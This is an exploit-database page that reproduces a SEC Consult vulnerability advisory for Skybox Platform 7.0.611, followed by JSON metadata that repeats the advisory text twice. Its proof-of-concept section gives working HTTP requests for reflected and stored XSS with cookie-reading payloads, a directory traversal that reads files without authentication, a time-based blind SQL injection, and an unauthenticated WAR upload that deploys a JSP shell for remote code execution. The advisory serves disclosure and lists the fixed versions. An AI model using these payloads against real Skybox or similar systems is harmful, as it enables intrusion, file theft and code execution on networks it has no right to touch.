ID 1337DAY-ID-24701 Type zdt Reporter SEC Consult Modified 2015-12-11T00:00:00
Description
Exploit for hardware platform in category web applications
Skybox Platform 7.0.611 - Multiple Vulnerabilities
product: Skybox Platform
vulnerable version: <=7.0.611
fixed version: 7.5.401
homepage: www.skyboxsecurity.com/products/appliance
=======================================================================
Vendor description:
-------------------
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/
Business recommendation:
------------------------
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.
SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
available vulnerabilities in the Skybox platform and increase the security
of its customers.
Vulnerability overview/description:
-----------------------------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution
Proof of concept:
-----------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the
service VersionRepositoryWebService:
POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863
<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><ns1:checkV
ersion
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85">&l
t;a
xmlns:a='http://www.w3.org/1999/xhtml'><a:body
onload='alert(1)'/></a>9884933253b"><components
soapenc:arrayType="soapenc:string[1]" xsi:type="soapenc:Array"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><components
xsi:type="soapenc:string">Application</components></components><os
xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">windows-64</os><curre
ntVersion
xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">7.0.601</currentVersi
on></ns1:checkVersion></soapenv:Body></soapenv:Envelope>
Other scripts and parameters, such as the parameter status of the login script
(located at https://localhost:444/login.html) are affected as well. The
following request demonstrates this issue:
https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc
ument.cookie%29%3C/script%3E
2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example when creating a new ticket, the title can be misused
to insert JavaScript code. The following request to the server demonstrates
the issue:
Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]
7|0|18|https://localhost:8443/skyboxview/webskybox/|272....5E|com.skybox.view.g
wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans
fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer
.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas
es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.
netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi
ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.
TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem
Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8
52682809||skyboxview|test"><img
src=yy onerror=alert(document.cookie) >|java.util.ArrayList/41
Other fields, like "Comments" and "Description", are affected as well.
3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows to upload and download attachments for tickets.
The download functionality can be exploited to download arbitrary files. No
authentication is required to exploit this vulnerability. The following
request demonstrates the issue:
POST /skyboxview/webskybox/attachmentdownload HTTP/1.1
Host: localhost:8443
tempShortFileName=aaaaaa&tempFileName=../../../../../../../../../../../windows/
win.ini
The script /skyboxview/webskybox/filedownload is also affected by the same
vulnerability.
Note: The upload functionality can also be used to upload files without
authentication.
4) Blind SQL Injection Vulnerability
Arbitrary SQL queries can be inserted into the service VersionWebService. The
following request demonstrates this issue with a simple sleep statement:
POST https://localhost:8443/skyboxview/webservice/services/VersionWebService
HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 619
Host: localhost:8443
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ver="http://com/skybox/view/webservice/version">
<soapenv:Header/>
<soapenv:Body>
<ver:getUserLockInSeconds
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">admin'+(select
* from (select(sleep(20)))a)+'</username>
</ver:getUserLockInSeconds>
</soapenv:Body>
</soapenv:Envelope>
No authentication is required to exploit this vulnerability.
5) Remote Unauthenticated Code Execution
It is possible to upload WAR files, containing for example JSP files, which
will be automatically deployed by the Skybox appliance. This way, it is
possible to upload a JSP shell which enables an attacker to execute arbitrary
commands running in the same context as the web server running (by default
skyboxview).
The following request to the Skyboxview update service (located at
https://localhost:9443) uploads a JSP file. It will be uploaded to
/opt/skyboxview/thirdparty/jboss/server/web/deploy where it is automatically
extracted and deployed at
/opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost.
POST /skyboxview-softwareupdate/services/CollectorSoftwareUpdate HTTP/1.1
Accept-Encoding: gzip,deflate
SOAPAction: ""
Content-Type: multipart/related; type="text/xml";
start="<[email protected]>";
boundary="----=_Part_1_1636307031.1418103287783"
MIME-Version: 1.0
User-Agent: Jakarta Commons-HttpClient/3.1
Host: localhost:9443
Content-Length: 1944
------=_Part_1_1636307031.1418103287783
Content-Type: text/xml; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-ID: <[email protected]>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:sof="http://com/skybox/view/agent/webservice/softwareupdate">
<soapenv:Header/>
<soapenv:Body>
<sof:uploadPatch
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<patchName xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">../../thirdparty/jbos
s/server/web/deploy/helloworld2.war</patchName>
<patchData href="cid:helloworld.war"/>
</sof:uploadPatch>
</soapenv:Body>
</soapenv:Envelope>
------=_Part_1_1636307031.1418103287783
Content-Type: application/octet-stream; name=helloworld.war
Content-Transfer-Encoding: binary
Content-ID: <helloworld.war>
Content-Disposition: attachment; name="helloworld.war"; filename="helloworld.wa
r"
[binary]
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the Skybox platform
version 7.0.611, which was the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
Communication with the vendor was handled by SEC Consult's client.
Solution:
---------
According to the release-notes, the issues have been fixed in the following
versions (reference number "19184"):
7.5.401: Reflected Cross-site scripting vulnerabilities
7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and
Directory Traversal
Users of Skybox are advised to upgrade to version 7.5.401 or higher.
# 0day.today [2018-03-28] #
{"published": "2015-12-11T00:00:00", "id": "1337DAY-ID-24701", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:31:59", "bulletin": {"published": "2015-12-11T00:00:00", "id": "1337DAY-ID-24701", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.7, "modified": "2016-04-19T23:31:59", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:C/"}}, "hash": "991c3463f6e497b1bb19c6edf5599338aa44cbaebfa8da268589ece8d9d21cd1", "description": "Exploit for hardware platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T23:31:59", "edition": 1, "title": "Skybox Platform 7.0.611 - Multiple Vulnerabilities", "href": "http://0day.today/exploit/description/24701", "modified": "2015-12-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/24701", "references": [], "reporter": "SEC Consult", "sourceData": "Skybox Platform 7.0.611 - Multiple Vulnerabilities\r\n product: Skybox Platform\r\n vulnerable version: <=7.0.611\r\n fixed version: 7.5.401\r\n homepage: www.skyboxsecurity.com/products/appliance\r\n=======================================================================\r\n \r\nVendor description:\r\n-------------------\r\n\"Skybox Security provides cutting-edge risk analytics for enterprise security\r\nmanagement. Our solutions give you complete network visibility, help you\r\neliminate attack vectors, and optimize your security management processes.\r\nProtect the network and the business.\"\r\nSource: http://www.skyboxsecurity.com/\r\n \r\nBusiness recommendation:\r\n------------------------\r\nAttackers are able to perform Cross-Site Scripting and SQL Injection attacks\r\nagainst the Skybox platform. Furthermore, it is possible for\r\nunauthenticated attackers to download arbitrary files and execute arbitrary\r\ncode.\r\n \r\nSEC Consult recommends the vendor to conduct a comprehensive security\r\nanalysis, based on security source code reviews, in order to identify all\r\navailable vulnerabilities in the Skybox platform and increase the security\r\nof its customers.\r\n \r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Multiple Reflected Cross-Site Scripting Vulnerabilities\r\n2) Multiple Stored Cross-Site Scripting Vulnerabilities\r\n3) Arbitrary File Download and Directory Traversal Vulnerability\r\n4) Blind SQL Injection Vulnerability\r\n5) Remote Unauthenticated Code Execution\r\n \r\nProof of concept:\r\n-----------------\r\n1) Multiple Reflected Cross-Site Scripting Vulnerabilities\r\nMultiple scripts are prone to reflected Cross-Site Scripting attacks.\r\nThe following example demonstrates this issue with the\r\nservice VersionRepositoryWebService:\r\n \r\nPOST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0\r\nContent-type: text/plain\r\nUser-Agent: Axis/1.4\r\nHost: localhost:8282\r\nSOAPAction: \"\"\r\nContent-Length: 863\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><soapenv:Envelope\r\nxmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><soapenv:Body><ns1:checkV\r\nersion\r\nsoapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\nxmlns:ns1=\"http://com/skybox/view/webservice/versionrepositoryc4f85\">&l\r\nt;a\r\nxmlns:a='http://www.w3.org/1999/xhtml'><a:body\r\nonload='alert(1)'/></a>9884933253b\"><components\r\nsoapenc:arrayType=\"soapenc:string[1]\" xsi:type=\"soapenc:Array\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\"><components\r\nxsi:type=\"soapenc:string\">Application</components></components><os\r\nxsi:type=\"soapenc:string\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">windows-64</os><curre\r\nntVersion\r\nxsi:type=\"soapenc:string\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">7.0.601</currentVersi\r\non></ns1:checkVersion></soapenv:Body></soapenv:Envelope>\r\n \r\nOther scripts and parameters, such as the parameter status of the login script\r\n(located at https://localhost:444/login.html) are affected as well. The\r\nfollowing request demonstrates this issue:\r\nhttps://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc\r\nument.cookie%29%3C/script%3E\r\n \r\n2) Multiple Stored Cross-Site Scripting Vulnerabilities\r\nMultiple fields of the Skybox Change Manager, which can be accessed at\r\nhttps://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting\r\nattacks. For example when creating a new ticket, the title can be misused\r\nto insert JavaScript code. The following request to the server demonstrates\r\nthe issue:\r\n \r\nRequest:\r\nPOST /skyboxview/webskybox/tickets HTTP/1.1\r\nHost: localhost:8443\r\n[...]\r\n7|0|18|https://localhost:8443/skyboxview/webskybox/|272....5E|com.skybox.view.g\r\nwt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans\r\nfer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer\r\n.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas\r\nes.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.\r\nnetmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi\r\new.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.\r\nTicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem\r\nId/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8\r\n52682809||skyboxview|test\"><img\r\nsrc=yy onerror=alert(document.cookie) >|java.util.ArrayList/41\r\n \r\nOther fields, like \"Comments\" and \"Description\", are affected as well.\r\n \r\n3) Arbitrary File Download and Directory Traversal Vulnerability\r\nSkybox Change Manager allows to upload and download attachments for tickets.\r\nThe download functionality can be exploited to download arbitrary files. No\r\nauthentication is required to exploit this vulnerability. The following\r\nrequest demonstrates the issue:\r\nPOST /skyboxview/webskybox/attachmentdownload HTTP/1.1\r\nHost: localhost:8443\r\ntempShortFileName=aaaaaa&tempFileName=../../../../../../../../../../../windows/\r\nwin.ini\r\n \r\nThe script /skyboxview/webskybox/filedownload is also affected by the same\r\nvulnerability.\r\n \r\nNote: The upload functionality can also be used to upload files without\r\nauthentication.\r\n \r\n4) Blind SQL Injection Vulnerability\r\nArbitrary SQL queries can be inserted into the service VersionWebService. The\r\nfollowing request demonstrates this issue with a simple sleep statement:\r\n \r\nPOST https://localhost:8443/skyboxview/webservice/services/VersionWebService\r\nHTTP/1.1\r\nAccept-Encoding: gzip,deflate\r\nContent-Type: text/xml;charset=UTF-8\r\nSOAPAction: \"\"\r\nContent-Length: 619\r\nHost: localhost:8443\r\nConnection: Keep-Alive\r\nUser-Agent: Apache-HttpClient/4.1.1 (java 1.5)\r\n<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\nxmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:ver=\"http://com/skybox/view/webservice/version\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <ver:getUserLockInSeconds\r\nsoapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <username xsi:type=\"soapenc:string\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">admin'+(select\r\n* from (select(sleep(20)))a)+'</username>\r\n </ver:getUserLockInSeconds>\r\n </soapenv:Body>\r\n</soapenv:Envelope>\r\n \r\nNo authentication is required to exploit this vulnerability.\r\n \r\n5) Remote Unauthenticated Code Execution\r\nIt is possible to upload WAR files, containing for example JSP files, which\r\nwill be automatically deployed by the Skybox appliance. This way, it is\r\npossible to upload a JSP shell which enables an attacker to execute arbitrary\r\ncommands running in the same context as the web server running (by default\r\nskyboxview).\r\nThe following request to the Skyboxview update service (located at\r\nhttps://localhost:9443) uploads a JSP file. It will be uploaded to\r\n/opt/skyboxview/thirdparty/jboss/server/web/deploy where it is automatically\r\nextracted and deployed at\r\n/opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost.\r\n \r\nPOST /skyboxview-softwareupdate/services/CollectorSoftwareUpdate HTTP/1.1\r\nAccept-Encoding: gzip,deflate\r\nSOAPAction: \"\"\r\nContent-Type: multipart/related; type=\"text/xml\";\r\nstart=\"<rootpart@soapui.org>\";\r\nboundary=\"----=_Part_1_1636307031.1418103287783\"\r\nMIME-Version: 1.0\r\nUser-Agent: Jakarta Commons-HttpClient/3.1\r\nHost: localhost:9443\r\nContent-Length: 1944\r\n \r\n------=_Part_1_1636307031.1418103287783\r\nContent-Type: text/xml; charset=UTF-8\r\nContent-Transfer-Encoding: 8bit\r\nContent-ID: <rootpart@soapui.org>\r\n<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\nxmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:sof=\"http://com/skybox/view/agent/webservice/softwareupdate\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <sof:uploadPatch\r\nsoapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <patchName xsi:type=\"soapenc:string\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">../../thirdparty/jbos\r\ns/server/web/deploy/helloworld2.war</patchName>\r\n<patchData href=\"cid:helloworld.war\"/>\r\n </sof:uploadPatch>\r\n </soapenv:Body>\r\n</soapenv:Envelope>\r\n------=_Part_1_1636307031.1418103287783\r\nContent-Type: application/octet-stream; name=helloworld.war\r\nContent-Transfer-Encoding: binary\r\nContent-ID: <helloworld.war>\r\nContent-Disposition: attachment; name=\"helloworld.war\"; filename=\"helloworld.wa\r\nr\"\r\n \r\n[binary]\r\n \r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in the Skybox platform\r\nversion 7.0.611, which was the most recent version at the time of discovery.\r\n \r\nVendor contact timeline:\r\n------------------------\r\nCommunication with the vendor was handled by SEC Consult's client.\r\n \r\nSolution:\r\n---------\r\nAccording to the release-notes, the issues have been fixed in the following\r\nversions (reference number \"19184\"):\r\n7.5.401: Reflected Cross-site scripting vulnerabilities\r\n7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and\r\n Directory Traversal\r\n \r\nUsers of Skybox are advised to upgrade to version 7.5.401 or higher.\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "460fe1ef639081c309d9540a68da93f2", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "2bebc19b72bd95e98513647d258e7828", "key": "description"}, {"hash": "3f2dd0f7aea5c2c57a2fe5c0c501add9", "key": "title"}, {"hash": "dff9b476ddd5115220ffce734616d4a3", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5b96d94c06a00f14cd5a135cd91a8d24", "key": "reporter"}, {"hash": "460fe1ef639081c309d9540a68da93f2", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7fb0d7c20ebb9c4613d043904daa5205", "key": "sourceHref"}, {"hash": "f9b119c06b49938c6bd4d04b4b16e623", "key": "sourceData"}], "objectVersion": "1.0"}}], "description": "Exploit for hardware platform in category web applications", "hash": "44c926e3432b1af6d67b59da01adff8d4b125ef37bd34a68b70eb718a69d7c38", "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2018-03-28T03:25:45"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-19184", "1337DAY-ID-9443", "1337DAY-ID-8282"]}], "modified": "2018-03-28T03:25:45"}, "vulnersScore": -0.8}, "type": "zdt", "lastseen": "2018-03-28T03:25:45", "edition": 2, "title": "Skybox Platform 7.0.611 - Multiple Vulnerabilities", "href": "https://0day.today/exploit/description/24701", "modified": "2015-12-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/24701", "references": [], "reporter": "SEC Consult", "sourceData": "Skybox Platform 7.0.611 - Multiple Vulnerabilities\r\n product: Skybox Platform\r\n vulnerable version: <=7.0.611\r\n fixed version: 7.5.401\r\n homepage: www.skyboxsecurity.com/products/appliance\r\n=======================================================================\r\n \r\nVendor description:\r\n-------------------\r\n\"Skybox Security provides cutting-edge risk analytics for enterprise security\r\nmanagement. Our solutions give you complete network visibility, help you\r\neliminate attack vectors, and optimize your security management processes.\r\nProtect the network and the business.\"\r\nSource: http://www.skyboxsecurity.com/\r\n \r\nBusiness recommendation:\r\n------------------------\r\nAttackers are able to perform Cross-Site Scripting and SQL Injection attacks\r\nagainst the Skybox platform. Furthermore, it is possible for\r\nunauthenticated attackers to download arbitrary files and execute arbitrary\r\ncode.\r\n \r\nSEC Consult recommends the vendor to conduct a comprehensive security\r\nanalysis, based on security source code reviews, in order to identify all\r\navailable vulnerabilities in the Skybox platform and increase the security\r\nof its customers.\r\n \r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Multiple Reflected Cross-Site Scripting Vulnerabilities\r\n2) Multiple Stored Cross-Site Scripting Vulnerabilities\r\n3) Arbitrary File Download and Directory Traversal Vulnerability\r\n4) Blind SQL Injection Vulnerability\r\n5) Remote Unauthenticated Code Execution\r\n \r\nProof of concept:\r\n-----------------\r\n1) Multiple Reflected Cross-Site Scripting Vulnerabilities\r\nMultiple scripts are prone to reflected Cross-Site Scripting attacks.\r\nThe following example demonstrates this issue with the\r\nservice VersionRepositoryWebService:\r\n \r\nPOST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0\r\nContent-type: text/plain\r\nUser-Agent: Axis/1.4\r\nHost: localhost:8282\r\nSOAPAction: \"\"\r\nContent-Length: 863\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><soapenv:Envelope\r\nxmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><soapenv:Body><ns1:checkV\r\nersion\r\nsoapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\nxmlns:ns1=\"http://com/skybox/view/webservice/versionrepositoryc4f85\">&l\r\nt;a\r\nxmlns:a='http://www.w3.org/1999/xhtml'><a:body\r\nonload='alert(1)'/></a>9884933253b\"><components\r\nsoapenc:arrayType=\"soapenc:string[1]\" xsi:type=\"soapenc:Array\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\"><components\r\nxsi:type=\"soapenc:string\">Application</components></components><os\r\nxsi:type=\"soapenc:string\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">windows-64</os><curre\r\nntVersion\r\nxsi:type=\"soapenc:string\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">7.0.601</currentVersi\r\non></ns1:checkVersion></soapenv:Body></soapenv:Envelope>\r\n \r\nOther scripts and parameters, such as the parameter status of the login script\r\n(located at https://localhost:444/login.html) are affected as well. The\r\nfollowing request demonstrates this issue:\r\nhttps://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc\r\nument.cookie%29%3C/script%3E\r\n \r\n2) Multiple Stored Cross-Site Scripting Vulnerabilities\r\nMultiple fields of the Skybox Change Manager, which can be accessed at\r\nhttps://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting\r\nattacks. For example when creating a new ticket, the title can be misused\r\nto insert JavaScript code. The following request to the server demonstrates\r\nthe issue:\r\n \r\nRequest:\r\nPOST /skyboxview/webskybox/tickets HTTP/1.1\r\nHost: localhost:8443\r\n[...]\r\n7|0|18|https://localhost:8443/skyboxview/webskybox/|272....5E|com.skybox.view.g\r\nwt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans\r\nfer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer\r\n.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas\r\nes.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.\r\nnetmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi\r\new.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.\r\nTicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem\r\nId/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8\r\n52682809||skyboxview|test\"><img\r\nsrc=yy onerror=alert(document.cookie) >|java.util.ArrayList/41\r\n \r\nOther fields, like \"Comments\" and \"Description\", are affected as well.\r\n \r\n3) Arbitrary File Download and Directory Traversal Vulnerability\r\nSkybox Change Manager allows to upload and download attachments for tickets.\r\nThe download functionality can be exploited to download arbitrary files. No\r\nauthentication is required to exploit this vulnerability. The following\r\nrequest demonstrates the issue:\r\nPOST /skyboxview/webskybox/attachmentdownload HTTP/1.1\r\nHost: localhost:8443\r\ntempShortFileName=aaaaaa&tempFileName=../../../../../../../../../../../windows/\r\nwin.ini\r\n \r\nThe script /skyboxview/webskybox/filedownload is also affected by the same\r\nvulnerability.\r\n \r\nNote: The upload functionality can also be used to upload files without\r\nauthentication.\r\n \r\n4) Blind SQL Injection Vulnerability\r\nArbitrary SQL queries can be inserted into the service VersionWebService. The\r\nfollowing request demonstrates this issue with a simple sleep statement:\r\n \r\nPOST https://localhost:8443/skyboxview/webservice/services/VersionWebService\r\nHTTP/1.1\r\nAccept-Encoding: gzip,deflate\r\nContent-Type: text/xml;charset=UTF-8\r\nSOAPAction: \"\"\r\nContent-Length: 619\r\nHost: localhost:8443\r\nConnection: Keep-Alive\r\nUser-Agent: Apache-HttpClient/4.1.1 (java 1.5)\r\n<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\nxmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:ver=\"http://com/skybox/view/webservice/version\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <ver:getUserLockInSeconds\r\nsoapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <username xsi:type=\"soapenc:string\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">admin'+(select\r\n* from (select(sleep(20)))a)+'</username>\r\n </ver:getUserLockInSeconds>\r\n </soapenv:Body>\r\n</soapenv:Envelope>\r\n \r\nNo authentication is required to exploit this vulnerability.\r\n \r\n5) Remote Unauthenticated Code Execution\r\nIt is possible to upload WAR files, containing for example JSP files, which\r\nwill be automatically deployed by the Skybox appliance. This way, it is\r\npossible to upload a JSP shell which enables an attacker to execute arbitrary\r\ncommands running in the same context as the web server running (by default\r\nskyboxview).\r\nThe following request to the Skyboxview update service (located at\r\nhttps://localhost:9443) uploads a JSP file. It will be uploaded to\r\n/opt/skyboxview/thirdparty/jboss/server/web/deploy where it is automatically\r\nextracted and deployed at\r\n/opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost.\r\n \r\nPOST /skyboxview-softwareupdate/services/CollectorSoftwareUpdate HTTP/1.1\r\nAccept-Encoding: gzip,deflate\r\nSOAPAction: \"\"\r\nContent-Type: multipart/related; type=\"text/xml\";\r\nstart=\"<[email\u00a0protected]>\";\r\nboundary=\"----=_Part_1_1636307031.1418103287783\"\r\nMIME-Version: 1.0\r\nUser-Agent: Jakarta Commons-HttpClient/3.1\r\nHost: localhost:9443\r\nContent-Length: 1944\r\n \r\n------=_Part_1_1636307031.1418103287783\r\nContent-Type: text/xml; charset=UTF-8\r\nContent-Transfer-Encoding: 8bit\r\nContent-ID: <[email\u00a0protected]>\r\n<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\nxmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:sof=\"http://com/skybox/view/agent/webservice/softwareupdate\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <sof:uploadPatch\r\nsoapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <patchName xsi:type=\"soapenc:string\"\r\nxmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">../../thirdparty/jbos\r\ns/server/web/deploy/helloworld2.war</patchName>\r\n<patchData href=\"cid:helloworld.war\"/>\r\n </sof:uploadPatch>\r\n </soapenv:Body>\r\n</soapenv:Envelope>\r\n------=_Part_1_1636307031.1418103287783\r\nContent-Type: application/octet-stream; name=helloworld.war\r\nContent-Transfer-Encoding: binary\r\nContent-ID: <helloworld.war>\r\nContent-Disposition: attachment; name=\"helloworld.war\"; filename=\"helloworld.wa\r\nr\"\r\n \r\n[binary]\r\n \r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in the Skybox platform\r\nversion 7.0.611, which was the most recent version at the time of discovery.\r\n \r\nVendor contact timeline:\r\n------------------------\r\nCommunication with the vendor was handled by SEC Consult's client.\r\n \r\nSolution:\r\n---------\r\nAccording to the release-notes, the issues have been fixed in the following\r\nversions (reference number \"19184\"):\r\n7.5.401: Reflected Cross-site scripting vulnerabilities\r\n7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and\r\n Directory Traversal\r\n \r\nUsers of Skybox are advised to upgrade to version 7.5.401 or higher.\n\n# 0day.today [2018-03-28] #", "hashmap": [{"hash": 